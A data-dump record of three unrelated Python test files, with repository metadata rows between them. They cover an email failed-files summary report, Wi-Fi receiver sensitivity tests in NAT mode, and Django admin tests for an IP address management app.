today = datetime.now().strftime('%Y-%m-%d')
output_filename = 'failed-files-{}'.format(today)
output_path = os.path.join(SANDBOX_DIR, output_filename)
self.assertTrue(os.path.exists(output_path))
with open(output_path) as output:
lines = output.read().splitlines()
self.assertEquals(len(lines), 12)
self.assertEquals(lines[0], 'MSC (placeholder@site.com)')
self.assertEquals(lines[1], 'Total files received: 5')
self.assertEquals(lines[2], 'Number of passed files: 2')
self.assertEquals(lines[3], 'Number of manually repaired files: 0')
self.assertEquals(lines[4], 'Number of failed files: 3')
self.assertEquals(lines[5], 'Summary of Failures:')
# Three error descriptions shared by all the files below.
self.assertNotIn('.csv', lines[6])
self.assertNotIn('.csv', lines[7])
self.assertNotIn('.csv', lines[8])
# Alphabetical order of files: the first one has capital F.
self.assertEquals(lines[9], 'File5.csv')
self.assertEquals(lines[10], 'file2.csv')
self.assertEquals(lines[11], 'file3.csv')
def test_email_summary_multiple_agencies(self):
"""Test email report generation where input has multiple agencies"""
input_root = resolve_test_data_path('data/reports/agencies')
email_report = report.EmailSummary(input_root, SANDBOX_DIR)
emails = {
'CAS-IAP': 'casiap@mail.com',
'DWD-MOHp': 'dwd@mail.com',
'MLCD-LU': 'mlcd@mail.com',
'MSC': 'msc@mail.com'
}
email_report.write(emails)
today = datetime.now().strftime('%Y-%m-%d')
output_filename = 'failed-files-{}'.format(today)
output_path = os.path.join(SANDBOX_DIR, output_filename)
self.assertTrue(os.path.exists(output_path))
with open(output_path) as output:
lines = output.read().splitlines()
self.assertEquals(len(lines), 29)
self.assertEquals(lines[0], 'CAS-IAP (casiap@mail.com)')
self.assertEquals(lines[1], 'Total files received: 1')
self.assertEquals(lines[2], 'Number of passed files: 1')
self.assertEquals(lines[3], 'Number of manually repaired files: 0')
self.assertEquals(lines[4], 'Number of failed files: 0')
self.assertEquals(lines[6], 'DWD-MOHp (dwd@mail.com)')
self.assertEquals(lines[7], 'Total files received: 3')
self.assertEquals(lines[8], 'Number of passed files: 2')
self.assertEquals(lines[9], 'Number of manually repaired files: 0')
self.assertEquals(lines[10], 'Number of failed files: 1')
self.assertEquals(lines[11], 'Summary of Failures:')
self.assertNotIn('.csv', lines[12])
self.assertEquals(lines[13], 'file2.csv')
self.assertEquals(lines[15], 'MLCD-LU (mlcd@mail.com)')
self.assertEquals(lines[16], 'Total files received: 3')
self.assertEquals(lines[17], 'Number of passed files: 3')
self.assertEquals(lines[18],
'Number of manually repaired files: 0')
self.assertEquals(lines[19], 'Number of failed files: 0')
self.assertEquals(lines[21], 'MSC (msc@mail.com)')
self.assertEquals(lines[22], 'Total files received: 5')
self.assertEquals(lines[23], 'Number of passed files: 4')
self.assertEquals(lines[24],
'Number of manually repaired files: 0')
self.assertEquals(lines[25], 'Number of failed files: 1')
self.assertEquals(lines[26], 'Summary of Failures:')
self.assertNotIn('.csv', lines[27])
self.assertEquals(lines[28], 'file4.csv')
def test_email_summary_multiple_runs(self):
"""Test email report generation across multiple operator reports"""
input_root = resolve_test_data_path('data/reports/multiple_runs')
email_report = report.EmailSummary(input_root, SANDBOX_DIR)
emails = {
'CAS-IAP': 'casiap@mail.com',
'DWD-MOHp': 'dwd@mail.com',
'MLCD-LU': 'mlcd@mail.com',
'MSC': 'msc@mail.com'
}
email_report.write(emails)
today = datetime.now().strftime('%Y-%m-%d')
output_filename = 'failed-files-{}'.format(today)
output_path = os.path.join(SANDBOX_DIR, output_filename)
self.assertTrue(os.path.exists(output_path))
with open(output_path) as output:
lines = output.read().splitlines()
self.assertEquals(len(lines), 29)
self.assertEquals(lines[0], 'CAS-IAP (casiap@mail.com)')
self.assertEquals(lines[1], 'Total files received: 1')
self.assertEquals(lines[2], 'Number of passed files: 1')
self.assertEquals(lines[3], 'Number of manually repaired files: 0')
self.assertEquals(lines[4], 'Number of failed files: 0')
self.assertEquals(lines[6], 'DWD-MOHp (dwd@mail.com)')
self.assertEquals(lines[7], 'Total files received: 3')
self.assertEquals(lines[8], 'Number of passed files: 2')
self.assertEquals(lines[9], 'Number of manually repaired files: 0')
self.assertEquals(lines[10], 'Number of failed files: 1')
self.assertEquals(lines[11], 'Summary of Failures:')
self.assertNotIn('.csv', lines[12])
self.assertEquals(lines[13], 'file2.csv')
self.assertEquals(lines[15], 'MLCD-LU (mlcd@mail.com)')
self.assertEquals(lines[16], 'Total files received: 3')
self.assertEquals(lines[17], 'Number of passed files: 3')
self.assertEquals(lines[18],
'Number of manually repaired files: 0')
self.assertEquals(lines[19], 'Number of failed files: 0')
self.assertEquals(lines[21], 'MSC (msc@mail.com)')
self.assertEquals(lines[22], 'Total files received: 5')
self.assertEquals(lines[23], 'Number of passed files: 4')
self.assertEquals(lines[24],
'Number of manually repaired files: 0')
self.assertEquals(lines[25], 'Number of failed files: 1')
self.assertEquals(lines[26], 'Summary of Failures:')
self.assertNotIn('.csv', lines[27])
self.assertEquals(lines[28], 'file4.csv')
def test_email_summary_single_fix(self):
"""
Test email report generation for a single file that is fixed
between two operator reports
"""
input_root = resolve_test_data_path('data/reports/one_fix')
email_report = report.EmailSummary(input_root, SANDBOX_DIR)
emails = {'MSC': 'placeholder@mail.com'}
email_report.write(emails)
today = datetime.now().strftime('%Y-%m-%d')
output_filename = 'failed-files-{}'.format(today)
output_path = os.path.join(SANDBOX_DIR, output_filename)
self.assertTrue(os.path.exists(output_path))
with open(output_path) as output:
lines = output.read().splitlines()
self.assertEquals(len(lines), 8)
self.assertEquals(lines[0], 'MSC (placeholder@mail.com)')
self.assertEquals(lines[1], 'Total files received: 1')
self.assertEquals(lines[2], 'Number of passed files: 0')
self.assertEquals(lines[3], 'Number of manually repaired files: 1')
self.assertEquals(lines[4], 'Number of failed files: 0')
self.assertEquals(lines[5], 'Summary of Fixes:')
self.assertNotIn('.csv', lines[6])
self.assertEquals(lines[7], 'file1.csv')
def test_email_report_mixed_pass_fix(self):
"""
Test email report generation when some files pass immediately
and others are fixed between runs.
"""
input_root = resolve_test_data_path('data/reports/pass_and_fix')
email_report = report.EmailSummary(input_root, SANDBOX_DIR)
emails = {'MSC': 'placeholder@mail.com'}
email_report.write(emails)
today = datetime.now().strftime('%Y-%m-%d')
output_filename = 'failed-files-{}'.format(today)
output_path = os.path.join(SANDBOX_DIR, output_filename)
self.assertTrue(os.path.exists(output_path))
with open(output_path) as output:
lines = output.read().splitlines()
self.assertEquals(len(lines), 11)
self.assertEquals(lines[0], 'MSC (placeholder@mail.com)')
self.assertEquals(lines[1], 'Total files received: 9')
self.assertEquals(lines[2], 'Number of passed files: 5')
self.assertEquals(lines[3], 'Number of manually repaired files: 4')
self.assertEquals(lines[4], 'Number of failed files: 0')
self.assertEquals(lines[5], 'Summary of Fixes:')
self.assertNotIn('.csv', lines[6])
self.assertEquals(lines[7], 'File5.csv')
self.assertEquals(lines[8], 'file2.csv')
self.assertEquals(lines[9], 'file3.csv')
self.assertEquals(lines[10], 'file9.csv')
def test_email_report_mixed_fail_fix(self):
"""
Test email report generation when some files fail irrecoverably
and others are fixed between runs
"""
input_root = resolve_test_data_path('data/reports/fix_and_fail')
email_report = report.EmailSummary(input_root, SANDBOX_DIR)
emails = {'MSC': 'placeholder@mail.com'}
email_report.write(emails)
today = datetime.now().strftime('%Y-%m-%d')
output_filename = 'failed-files-{}'.format(today)
output_path = os.path.join(SANDBOX_DIR, output_filename)
self.assertTrue(os.path.exists(output_path))
with open(output_path) as output:
lines = output.read().splitlines()
self.assertEquals(len(lines), 17)
self.assertEquals(lines[0], 'MSC (placeholder@mail.com)')
self.assertEquals(lines[1], 'Total files received: 8')
self.assertEquals(lines[2], 'Number of passed files: 0')
self.assertEquals(lines[3], 'Number of manually repaired files: 3')
self.assertEquals(lines[4], 'Number of failed files: 5')
self.assertEquals(lines[5], 'Summary of Failures:')
self.assertNotIn('.csv', lines[6])
self.assertEquals(lines[7], 'file1.csv')
self.assertEquals(lines[8], 'file3.csv')
self.assertEquals(lines[9], 'file4.csv')
self.assertEquals(lines[10], 'file7.csv')
self.assertEquals(lines[11], 'file8.csv')
self.assertEquals(lines[12], 'Summary of Fixes:')
self.assertNotIn('.csv', lines[13])
self.assertEquals(lines[14], 'file2.csv')
self.assertEquals(lines[15], 'file5.csv')
self.assertEquals(lines[16], 'file6.csv')
def test_email_summary_fix_but_still_fail(self):
"""
Test email report generation when files are fixed between runs,
only to have an irrecoverable error show up.
"""
input_root = resolve_test_data_path('data/reports/fail_twice')
email_report = report.EmailSummary(input_root, SANDBOX_DIR)
emails = {'MSC': 'placeholder@mail.com'}
email_report.write(emails)
today = datetime.now().strftime('%Y-%m-%d')
output_filename = 'failed-files-{}'.format(today)
output_path = os.path.join(SANDBOX_DIR, output_filename)
self.assertTrue(os.path.exists(output_path))
with open(output_path) as output:
lines = output.read().splitlines()
self.assertEquals(len(lines), 8)
self.assertEquals(lines[0], 'MSC (placeholder@mail.com)')
self.assertEquals(lines[1], 'Total files received: 1')
self.assertEquals(lines[2], 'Number of passed files: 0')
self.assertEquals(lines[3], 'Number of manually repaired files: 0')
self.assertEquals(lines[4], 'Number of failed files: 1')
self.assertEquals(lines[5], 'Summary of Failures:')
self.assertNotIn('.csv', lines[6])
self.assertEquals(lines[7], 'file1.csv')
def test_email_summary_mixed_pass_fix_fail(self):
"""
Test email report generation when some files pass immediately,
some fail irrecoverably, and others are fixed between runs.
"""
input_root = resolve_test_data_path('data/reports/pass_fix_fail')
email_report = report.EmailSummary(input_root, SANDBOX_DIR)
emails = {'MSC': 'placeholder@mail.com'}
email_report.write(emails)
today = datetime.now().strftime('%Y-%m-%d')
output_filename = 'failed-files-{}'.format(today)
output_path = os.path.join(SANDBOX_DIR, output_filename)
self.assertTrue(os.path.exists(output_path))
with open(output_path) as output:
lines = output.read().splitlines()
self.assertEquals(len(lines), 19)
# Output may be sorted in various ways, so just check that all
# files are in the right block and are all accounted for.
fail_group = ['file4.csv', 'file9.csv']
first_fix_of_pair = ['file2.csv', 'file6.csv']
second_fix_of_pair = ['file3.csv', 'file8.csv']
self.assertEquals(lines[0], 'MSC (placeholder@mail.com)')
self.assertEquals(lines[1], 'Total files received: 11')
self.assertEquals(lines[2], 'Number of passed files: 5')
self.assertEquals(lines[3], 'Number of manually repaired files: 4')
self.assertEquals(lines[4], 'Number of failed files: 2')
self.assertEquals(lines[5], 'Summary of Failures:')
self.assertNotIn('.csv', lines[6])
self.assertIn(lines[7], fail_group)
self.assertNotIn('.csv', lines[8])
self.assertIn(lines[9], fail_group)
self.assertEquals(lines[10], 'Summary of Fixes:')
self.assertNotIn('.csv', lines[11])
self.assertNotIn('.csv', lines[12])
self.assertIn(lines[13], first_fix_of_pair)
self.assertIn(lines[14], second_fix_of_pair)
self.assertNotIn('.csv', lines[15])
self.assertNotIn('.csv', lines[16])
self.assertIn(lines[17], first_fix_of_pair)
self.assertIn(lines[18], second_fix_of_pair)
def test_email_summary_multiple_causes(self):
"""
Test email report generation when files fail or are fixed due to
multiple different issues.
"""
input_root = resolve_test_data_path(
'data/reports/multiple_causes_two_runs')
email_report = report.EmailSummary(input_root, SANDBOX_DIR)
emails = {'MSC': 'placeholder@mail.com'}
email_report.write(emails)
today = datetime.now().strftime('%Y-%m-%d')
output_filename = 'failed-files-{}'.format(today)
output_path = os.path.join(SANDBOX_DIR, output_filename)
self.assertTrue(os.path.exists(output_path))
with open(output_path) as output:
lines = output.read().splitlines()
self.assertEquals(len(lines), 17)
self.assertEquals(lines[0], 'MSC (placeholder@mail.com)')
self.assertEquals(lines[1], 'Total files received: 5')
self.assertEquals(lines[2], 'Number of passed files: 0')
self.assertEquals(lines[3], 'Number of manually repaired files: 2')
self.assertEquals(lines[4], 'Number of failed files: 3')
fix_group = ['file1.csv', 'file3.csv']
fail_group = ['file2.csv', 'file4.csv', 'file5.csv']
self.assertEquals(lines[5], 'Summary of Failures:')
self.assertNotIn('.csv', lines[6])
self.assertIn(lines[7], fail_group)
self.assertNotIn('.csv', lines[8])
self.assertIn(lines[9], fail_group)
self.assertNotIn('.csv', lines[10])
self.assertIn(lines[11], fail_group)
self.assertEquals(lines[12], 'Summary of Fixes:')
self.assertNotIn('.csv', lines[13])
self.assertIn(lines[14], fix_group)
self.assertNotIn('.csv', lines[15])
self.assertIn(lines[16], fix_group)
# Check that all error causes (messages) are distinct.
self.assertEquals(len(set([lines[6], lines[8], lines[10]])), 3)
self.assertEquals(len(set([lines[13], lines[15]])), 2)
if __name__ == '__main__':
unittest.main()
| 40.003543
| 79
| 0.601563
| 5,099
| 45,164
| 5.171014
| 0.071387
| 0.115902
| 0.10991
| 0.020897
| 0.840824
| 0.783555
| 0.750446
| 0.72678
| 0.699473
| 0.685402
| 0
| 0.015976
| 0.287641
| 45,164
| 1,128
| 80
| 40.039007
| 0.803562
| 0.074373
| 0
| 0.698558
| 0
| 0
| 0.12928
| 0.025323
| 0
| 0
| 0
| 0
| 0.359109
| 1
| 0.044561
| false
| 0.077326
| 0.007864
| 0
| 0.061599
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 6
|
b9b9e611841345fc2a9c6ae2251ade1b1108d04e
| 7,237
|
py
|
Python
|
tests/e2e/advanced/receiver_sensitivity/test_nat_mode_all_mcs.py
|
DYeag/wlan-testing
|
81e879d04ea3c6a55d14a330d461d8914507e3b2
|
[
"BSD-3-Clause"
] | 7
|
2020-08-19T16:45:46.000Z
|
2022-02-10T09:55:22.000Z
|
tests/e2e/advanced/receiver_sensitivity/test_nat_mode_all_mcs.py
|
DYeag/wlan-testing
|
81e879d04ea3c6a55d14a330d461d8914507e3b2
|
[
"BSD-3-Clause"
] | 47
|
2020-12-20T16:06:03.000Z
|
2022-03-23T03:01:22.000Z
|
tests/e2e/advanced/receiver_sensitivity/test_nat_mode_all_mcs.py
|
DYeag/wlan-testing
|
81e879d04ea3c6a55d14a330d461d8914507e3b2
|
[
"BSD-3-Clause"
] | 9
|
2021-02-04T22:32:06.000Z
|
2021-12-14T17:45:51.000Z
|
"""
Performance Test: Receiver Sensitivity Test: NAT Mode
pytest -m "rx_sensitivity_test and nat"
"""
import os
import pytest
import allure
pytestmark = [pytest.mark.rx_sensitivity_test, pytest.mark.nat,
pytest.mark.usefixtures("setup_test_run")]
setup_params_general = {
"mode": "NAT",
"ssid_modes": {
"wpa2_personal": [
{"ssid_name": "ssid_wpa2_2g", "appliedRadios": ["is2dot4GHz"], "security_key": "something"},
{"ssid_name": "ssid_wpa2_5g", "appliedRadios": ["is5GHzU", "is5GHz", "is5GHzL"],
"security_key": "something"}]},
"rf": {
"is5GHz": {"channelBandwidth": "is20MHz"},
"is5GHzL": {"channelBandwidth": "is20MHz"},
"is5GHzU": {"channelBandwidth": "is20MHz"}},
"radius": False,
"attenuator": {
"attenuator": "1.1.3059",
"attenuator2": "1.1.3034"}
}
@allure.feature("NAT MODE CLIENT CONNECTIVITY")
@pytest.mark.parametrize(
'setup_profiles',
[setup_params_general],
indirect=True,
scope="class"
)
@pytest.mark.usefixtures("setup_profiles")
class TestRxSensitivityNATAllMcs5G(object):
@allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-2445", name="WIFI-2445")
@pytest.mark.wpa2_personal
@pytest.mark.fiveg
@pytest.mark.all_mcs
def test_client_wpa2_personal_nat_all_mcs_5g(self, get_vif_state,
lf_test, station_names_fiveg, create_lanforge_chamberview_dut,
get_configuration):
"""Receiver Sensitivity nat Mode
pytest -m "rx_sensitivity_test and nat and wpa2_personal and fiveg"
"""
profile_data = setup_params_general["ssid_modes"]["wpa2_personal"][1]
ssid_name = profile_data["ssid_name"]
security_key = profile_data["security_key"]
security = "wpa2"
attenuator = setup_params_general["attenuator"]["attenuator"]
attenuator2 = setup_params_general["attenuator"]["attenuator2"]
mode = "NAT"
band = "fiveg"
vlan = 1
dut_name = create_lanforge_chamberview_dut
raw_lines = [['txo_preamble: VHT'],
['txo_mcs: 0 CCK, OFDM, HT, VHT;1 CCK, OFDM, HT, VHT;2 CCK, OFDM, HT, VHT;3 CCK, OFDM, HT, VHT'
'4 OFDM, HT, VHT;5 OFDM, HT, VHT;6 OFDM, HT, VHT;7 OFDM, HT, VHT;8 VHT;9 VHT'],
['spatial_streams: 1'], ['bandw_options: 20'], ['txo_sgi: OFF'],
['txo_retries: No Retry'], ['attenuator: %s' % attenuator], ['attenuator2: %s' % attenuator2],
["show_3s: 1"], ['txo_txpower: 17'],
["show_ll_graphs: 1"], ["show_log: 1"]]
if ssid_name not in get_vif_state:
allure.attach(name="retest,vif state ssid not available:", body=str(get_vif_state))
pytest.xfail("SSID NOT AVAILABLE IN VIF STATE")
station = lf_test.Client_Connect(ssid=ssid_name, security=security,
passkey=security_key, mode=mode, band=band,
station_name=station_names_fiveg, vlan_id=vlan)
if station:
dp_obj = lf_test.rx_sensitivity(station_name=station_names_fiveg, mode=mode,
instance_name="TIP_PERF_RX_SEN_WPA2_NAT_5G_ALL_MCS",
vlan_id=vlan, dut_name=dut_name, raw_lines=raw_lines)
report_name = dp_obj.report_name[0]['LAST']["response"].split(":::")[1].split("/")[-1]
entries = os.listdir("../reports/" + report_name + '/')
pdf = False
for i in entries:
if ".pdf" in i:
pdf = i
if pdf:
allure.attach.file(source="../reports/" + report_name + "/" + pdf,
name=get_configuration["access_point"][0]["model"] + "_dataplane")
print("Test Completed... Cleaning up Stations")
lf_test.Client_disconnect(station_name=station_names_fiveg)
assert station
else:
assert False
@allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-2445", name="WIFI-2445")
@pytest.mark.wpa2_personal
@pytest.mark.twog
@pytest.mark.all_mcs
def test_client_wpa2_personal_nat_all_mcs_2g(self, get_vif_state,
lf_test, station_names_twog, create_lanforge_chamberview_dut,
get_configuration):
"""Receiver Sensitivity nat Mode
pytest -m "rx_sensitivity_test and nat and wpa2_personal and twog"
"""
profile_data = setup_params_general["ssid_modes"]["wpa2_personal"][0]
ssid_name = profile_data["ssid_name"]
security_key = profile_data["security_key"]
security = "wpa2"
attenuator = setup_params_general["attenuator"]["attenuator"]
attenuator2 = setup_params_general["attenuator"]["attenuator2"]
mode = "NAT"
band = "twog"
vlan = 1
dut_name = create_lanforge_chamberview_dut
raw_lines = [['txo_preamble: VHT'],
['txo_mcs: 0 CCK, OFDM, HT, VHT;1 CCK, OFDM, HT, VHT;2 CCK, OFDM, HT, VHT;3 CCK, OFDM, HT, VHT'
'4 OFDM, HT, VHT;5 OFDM, HT, VHT;6 OFDM, HT, VHT;7 OFDM, HT, VHT;8 VHT;9 VHT'],
['spatial_streams: 1'], ['bandw_options: 20'], ['txo_sgi: OFF'],
['txo_retries: No Retry'], ['attenuator: %s' % attenuator], ['attenuator2: %s' % attenuator2],
["show_3s: 1"], ['txo_txpower: 17'],
["show_ll_graphs: 1"], ["show_log: 1"]]
if ssid_name not in get_vif_state:
allure.attach(name="retest,vif state ssid not available:", body=str(get_vif_state))
pytest.xfail("SSID NOT AVAILABLE IN VIF STATE")
station = lf_test.Client_Connect(ssid=ssid_name, security=security,
passkey=security_key, mode=mode, band=band,
station_name=station_names_twog, vlan_id=vlan)
if station:
dp_obj = lf_test.rx_sensitivity(station_name=station_names_twog, mode=mode,
instance_name="TIP_PERF_RX_SEN_WPA2_NAT_2G_ALL_MCS",
vlan_id=vlan, dut_name=dut_name, raw_lines=raw_lines)
report_name = dp_obj.report_name[0]['LAST']["response"].split(":::")[1].split("/")[-1]
entries = os.listdir("../reports/" + report_name + '/')
pdf = False
for i in entries:
if ".pdf" in i:
pdf = i
if pdf:
allure.attach.file(source="../reports/" + report_name + "/" + pdf,
name=get_configuration["access_point"][0]["model"] + "_dataplane")
print("Test Completed... Cleaning up Stations")
lf_test.Client_disconnect(station_name=station_names_twog)
assert station
else:
assert False
| 48.898649
| 116
| 0.566948
| 817
| 7,237
| 4.755202
| 0.19951
| 0.02471
| 0.037066
| 0.02471
| 0.818018
| 0.796654
| 0.796654
| 0.796654
| 0.779665
| 0.744402
| 0
| 0.02459
| 0.30883
| 7,237
| 147
| 117
| 49.231293
| 0.752099
| 0.039796
| 0
| 0.619048
| 0
| 0.031746
| 0.262462
| 0.010173
| 0
| 0
| 0
| 0
| 0.031746
| 1
| 0.015873
| false
| 0.015873
| 0.02381
| 0
| 0.047619
| 0.015873
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
b9df18e613e01c34032da89f9650086a269cb026
| 11,206
|
py
|
Python
|
django_ipam/tests/base/test_admin.py
|
pawelplsi/django-ipam
|
bb8cf38883aa6bd05af34134542671b50d616a62
|
[
"BSD-3-Clause"
] | null | null | null |
django_ipam/tests/base/test_admin.py
|
pawelplsi/django-ipam
|
bb8cf38883aa6bd05af34134542671b50d616a62
|
[
"BSD-3-Clause"
] | null | null | null |
django_ipam/tests/base/test_admin.py
|
pawelplsi/django-ipam
|
bb8cf38883aa6bd05af34134542671b50d616a62
|
[
"BSD-3-Clause"
] | null | null | null |
import json
from django.contrib.auth import get_user_model
from django.core.files.uploadedfile import SimpleUploadedFile
from django.urls import reverse
User = get_user_model()
class BaseTestAdmin(object):
def setUp(self):
User.objects.create_superuser(username='admin',
password='tester',
email='admin@admin.com')
self.client.login(username='admin', password='tester')
def test_ipaddress_invalid_entry(self):
subnet = self._create_subnet(subnet='10.0.0.0/24', description='Sample Subnet')
post_data = self._post_data(ip_address='1234',
subnet=str(subnet.id),
created_0='2017-08-08',
created_1='15:16:10',
modified_0='2017-08-08',
modified_1='15:16:10')
response = self.client.post(reverse('admin:{0}_ipaddress_add'.format(self.app_name)),
json.loads(post_data), follow=True)
self.assertContains(response, 'ok')
self.assertContains(response, 'Enter a valid IPv4 or IPv6 address.')
def test_ipaddress_change(self):
subnet = self._create_subnet(subnet='10.0.0.0/24', description='Sample Subnet')
obj = self._create_ipaddress(ip_address='10.0.0.1', subnet=subnet)
response = self.client.get(reverse('admin:{0}_ipaddress_change'.format(self.app_name), args=[obj.pk]),
follow=True)
self.assertContains(response, 'ok')
self.assertEqual(self.ipaddress_model.objects.get(pk=obj.pk).ip_address, '10.0.0.1')
def test_ipv4_subnet_change(self):
subnet = self._create_subnet(subnet='10.0.0.0/24', description='Sample Subnet')
self._create_ipaddress(ip_address='10.0.0.1', subnet=subnet)
url = reverse('admin:{0}_subnet_change'.format(self.app_name), args=[subnet.pk])
response = self.client.get(url)
self.assertContains(response, 'ok')
self.assertContains(response, '<h3>Subnet Visual Display</h3>')
def test_ipv6_subnet_change(self):
subnet = self._create_subnet(subnet='fdb6:21b:a477::9f7/64', description='Sample Subnet')
self._create_ipaddress(ip_address='fdb6:21b:a477::9f7', subnet=subnet)
response = self.client.get(reverse('admin:{0}_subnet_change'.format(self.app_name), args=[subnet.pk]),
follow=True)
self.assertContains(response, 'ok')
self.assertContains(response, '<h3>Subnet Visual Display</h3>')
def test_subnet_invalid_entry(self):
post_data = self._post_data(subnet=1234,
created_0='2017-08-08',
created_1='15:16:10',
modified_0='2017-08-08',
modified_1='15:16:10')
response = self.client.post(reverse('admin:{0}_subnet_add'.format(self.app_name)),
json.loads(post_data), follow=True)
self.assertContains(response, 'ok')
self.assertContains(response, 'Enter a valid CIDR address.')
def test_subnet_popup_response(self):
subnet = self._create_subnet(subnet='fdb6:21b:a477::9f7/64', description='Sample Subnet')
self._create_ipaddress(ip_address='fdb6:21b:a477::9f7', subnet=subnet)
response = self.client.get(reverse('admin:{0}_subnet_change'.format(self.app_name),
args=[subnet.id]) + '?_popup=1',
follow=True)
self.assertContains(response, 'ok')
def test_ipaddress_response(self):
subnet = self._create_subnet(subnet='10.0.0.0/24', description='Sample Subnet')
post_data = self._post_data(ip_address='10.0.0.1',
subnet=str(subnet.id),
created_0='2017-08-08',
created_1='15:16:10',
modified_0='2017-08-08',
modified_1='15:16:10')
response = self.client.post(reverse('admin:{0}_ipaddress_add'.format(self.app_name)),
json.loads(post_data), follow=True)
self.assertContains(response, 'ok')
def test_ipaddress_popup_response(self):
subnet = self._create_subnet(subnet='10.0.0.0/24', description='Sample Subnet')
post_data = self._post_data(ip_address='10.0.0.1',
subnet=str(subnet.id),
created_0='2017-08-08',
created_1='15:16:10',
modified_0='2017-08-08',
modified_1='15:16:10',
_popup=1)
response = self.client.post(reverse('admin:{0}_ipaddress_add'.format(self.app_name)),
json.loads(post_data))
self.assertContains(response, 'opener.dismissAddAnotherPopup(window);')
def test_csv_upload(self):
csv_data = """Monachers - Matera,
10.27.1.0/24,
,
ip address,description
10.27.1.1,Monachers
10.27.1.252,NanoStation M5
10.27.1.253,NanoStation M5
10.27.1.254,Nano Beam 5 19AC"""
csvfile = SimpleUploadedFile('data.csv', bytes(csv_data, 'utf-8'))
response = self.client.post(reverse('admin:ipam_import_subnet'.format(self.app_name)),
{'csvfile': csvfile}, follow=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(str(self.subnet_model.objects.first().subnet), '10.27.1.0/24')
self.assertEqual(str(self.ipaddress_model.objects.all()[0].ip_address), '10.27.1.1')
self.assertEqual(str(self.ipaddress_model.objects.all()[1].ip_address), '10.27.1.252')
self.assertEqual(str(self.ipaddress_model.objects.all()[2].ip_address), '10.27.1.253')
self.assertEqual(str(self.ipaddress_model.objects.all()[3].ip_address), '10.27.1.254')
def test_existing_csv_data(self):
subnet = self._create_subnet(name='Monachers - Matera', subnet='10.27.1.0/24')
self._create_ipaddress(ip_address='10.27.1.1', subnet=subnet, description='Monachers')
csv_data = """Monachers - Matera,
10.27.1.0/24,
,
ip address,description
10.27.1.1,Monachers
10.27.1.252,NanoStation M5
10.27.1.253,NanoStation M5
10.27.1.254,Nano Beam 5 19AC"""
csvfile = SimpleUploadedFile('data.csv', bytes(csv_data, 'utf-8'))
response = self.client.post(reverse('admin:ipam_import_subnet'.format(self.app_name)),
{'csvfile': csvfile}, follow=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(str(self.ipaddress_model.objects.all()[1].ip_address), '10.27.1.252')
self.assertEqual(str(self.ipaddress_model.objects.all()[2].ip_address), '10.27.1.253')
self.assertEqual(str(self.ipaddress_model.objects.all()[3].ip_address), '10.27.1.254')
def test_invalid_file_type(self):
csv_data = """Monachers - Matera,
10.27.1.0/24,
,
ip address,description
10.27.1.1,Monachers
10.27.1.252,NanoStation M5
10.27.1.253,NanoStation M5
10.27.1.254,Nano Beam 5 19AC"""
csvfile = SimpleUploadedFile('data.txt', bytes(csv_data, 'utf-8'))
response = self.client.post(reverse('admin:ipam_import_subnet'.format(self.app_name)),
{'csvfile': csvfile}, follow=True)
self.assertEqual(response.status_code, 200)
self.assertContains(response, 'File type not supported.')
def test_invalid_subnet_csv_data(self):
csv_data = """Monachers - Matera,
12324324,
,
ip address,description
10.27.1.1,Monachers
NanoStation M5
10.27.1.253,NanoStation M5
10.27.1.254,Nano Beam 5 19AC"""
csvfile = SimpleUploadedFile('data.csv', bytes(csv_data, 'utf-8'))
response = self.client.post(reverse('admin:ipam_import_subnet'.format(self.app_name)),
{'csvfile': csvfile}, follow=True)
self.assertEqual(response.status_code, 200)
self.assertContains(response, 'does not appear to be an IPv4 or IPv6 network')
def test_invalid_ipaddress_csv_data(self):
csv_data = """Monachers - Matera,
10.27.1.0/24,
,
ip address,description
10123142131,Monachers
10.27.1.252,NanoStation M5
10.27.1.253,NanoStation M5
10.27.1.254,Nano Beam 5 19AC"""
csvfile = SimpleUploadedFile('data.csv', bytes(csv_data, 'utf-8'))
response = self.client.post(reverse('admin:ipam_import_subnet'.format(self.app_name)),
{'csvfile': csvfile}, follow=True)
self.assertEqual(response.status_code, 200)
self.assertContains(response, 'does not appear to be an IPv4 or IPv6 address')
def test_subnet_csv_export(self):
subnet = self._create_subnet(subnet='10.0.0.0/24', name='Sample Subnet')
self._create_ipaddress(ip_address='10.0.0.1', subnet=subnet, description='Testing')
self._create_ipaddress(ip_address='10.0.0.2', subnet=subnet, description='Testing')
self._create_ipaddress(ip_address='10.0.0.3', subnet=subnet)
self._create_ipaddress(ip_address='10.0.0.4', subnet=subnet)
csv_data = """Sample Subnet\r
10.0.0.0/24\r
\r
ip_address,description\r
10.0.0.1,Testing\r
10.0.0.2,Testing\r
10.0.0.3,\r
10.0.0.4,\r
"""
csv_data = bytes(csv_data.replace(' ', ''), 'utf-8')
url = reverse('admin:ipam_export_subnet', args=[subnet.id])
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, csv_data)
def test_importcsv_form(self):
response = self.client.get(reverse('admin:ipam_import_subnet'))
self.assertEqual(response.status_code, 200)
def test_hierarchy_tree(self):
subnet_root = self._create_subnet(subnet='11.0.0.0/23', name='Root')
subnet_child = self._create_subnet(subnet='11.0.0.0/24', name='Child#1', master_subnet=subnet_root)
self._create_subnet(subnet='11.0.1.0/24', name='Child#2', master_subnet=subnet_root)
self._create_subnet(subnet='11.0.0.0/25', name='Grantchild#1', master_subnet=subnet_child)
url = reverse('admin:{0}_subnet_change'.format(self.app_name), args=[subnet_child.id])
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertContains(response, "11.0.0.0/23 (Root)")
self.assertContains(response, "11.0.0.0/24 (Child#1)")
self.assertContains(response, "11.0.1.0/24 (Child#2)")
self.assertContains(response, "11.0.0.0/25 (Grantchild#1)")
| 50.477477
| 110
| 0.597359
